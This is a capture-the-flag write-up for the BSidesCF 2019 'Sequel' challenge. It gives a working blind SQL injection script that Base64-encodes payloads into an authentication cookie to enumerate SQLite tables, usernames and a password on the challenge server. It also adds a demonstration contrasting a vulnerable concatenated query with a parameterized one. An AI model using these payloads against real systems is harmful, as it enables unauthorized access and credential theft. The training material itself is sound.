[BSidesCF 2019]Sequel

SQLite injection

Brute-forcing the login form yields the credentials guest / guest.

After being stuck for a while, I found the following value in the cookie:

eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9

Base64-decoding it gives:

{"username":"guest","password":"guest"}

My guess is that the injection point is the cookie.

import requests
import base64
import string

flag = ""

url='http://2d906c68-d6cd-4d37-9337-bd49f2852627.node3.buuoj.cn/sequels'
for i in range(50):
    for j in string.printable:
        tmp = flag + j
        '''
        # table names
        if j == 'n': continue
        if j == 'r': continue
        if j == 's': continue
        payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        # table_name notes,reviews,sqlite,uSeRiNfo
        '''

        '''
        # username
        if j == 'g': continue
        payload = r'{{"username":"\" OR EXISTS(SELECT username FROM userinfo WHERE username LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        # username guest,sequeladmin
        '''

        # password
        payload = r'{{"username":"\" OR EXISTS(SELECT password FROM userinfo WHERE password LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        # password f5ec3af19f0d3679e7d5a148f4ac323d
        # The cookie is the Base64 encoding of the JSON document
        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')

        r = requests.get(url, cookies={"1337_AUTH" : payload})
        # "Movie" in the response means the injected condition was true
        if "Movie" in r.text:
            flag = tmp
            print(flag)
            break

Logging in with the recovered credentials gives the flag.

For tables, sqlite_master is defined as:
CREATE TABLE sqlite_master (
type TEXT, -- table
name TEXT, -- table name
tbl_name TEXT, -- table name
rootpage INTEGER, -- not sure
sql TEXT -- the CREATE TABLE statement
);
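
Why the cookie probe above works as a true/false oracle, and what stops it, shown as an added example (not code from the challenge or from the original post). The server-side query in `check_vulnerable` is an assumption about how the challenge builds its SQL; the table rows and the `constructed-secret` password are constructed sample data, and the function names are hypothetical.

```python
import base64
import json
import sqlite3

# Cookie value shown on the page (Base64 of the guest/guest JSON).
GUEST_COOKIE = "eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9"
# Username field of the page's password probe; {} is the guessed prefix.
PROBE = '" OR EXISTS(SELECT password FROM userinfo WHERE password LIKE "{}%") OR "'

def make_db():
    # Constructed stand-in for the challenge database (sample rows only).
    db = sqlite3.connect(":memory:")
    if hasattr(sqlite3, "SQLITE_DBCONFIG_DQS_DML"):  # Python 3.12+
        # The probe relies on SQLite accepting "double-quoted" strings.
        db.setconfig(sqlite3.SQLITE_DBCONFIG_DQS_DML, True)
    db.execute("CREATE TABLE userinfo (username TEXT, password TEXT)")
    db.executemany("INSERT INTO userinfo VALUES (?, ?)",
                   [("guest", "guest"), ("sequeladmin", "constructed-secret")])
    return db

def make_cookie(username, password="guest"):
    raw = json.dumps({"username": username, "password": password})
    return base64.b64encode(raw.encode("utf-8")).decode("ascii")

def read_cookie(cookie):
    creds = json.loads(base64.b64decode(cookie))
    return str(creds["username"]), str(creds["password"])

def check_vulnerable(db, cookie):
    # Assumed bug: cookie fields are pasted into the SQL text.
    user, pw = read_cookie(cookie)
    sql = 'SELECT 1 FROM userinfo WHERE username = "%s" AND password = "%s"' % (user, pw)
    return db.execute(sql).fetchone() is not None

def check_hardened(db, cookie):
    # Bound parameters: cookie content is compared as data, never parsed as SQL.
    user, pw = read_cookie(cookie)
    sql = "SELECT 1 FROM userinfo WHERE username = ? AND password = ?"
    return db.execute(sql, (user, pw)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    for label, cookie in [("guest login", GUEST_COOKIE),
                          ("probe, matching prefix", make_cookie(PROBE.format("c"))),
                          ("probe, non-matching prefix", make_cookie(PROBE.format("z")))]:
        print(label, check_vulnerable(db, cookie), check_hardened(db, cookie))
```

With the concatenated query the result depends only on the `EXISTS` subquery, because `"" AND password = "guest"` evaluates to false; with bound parameters both probes are rejected and only the real guest cookie passes.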
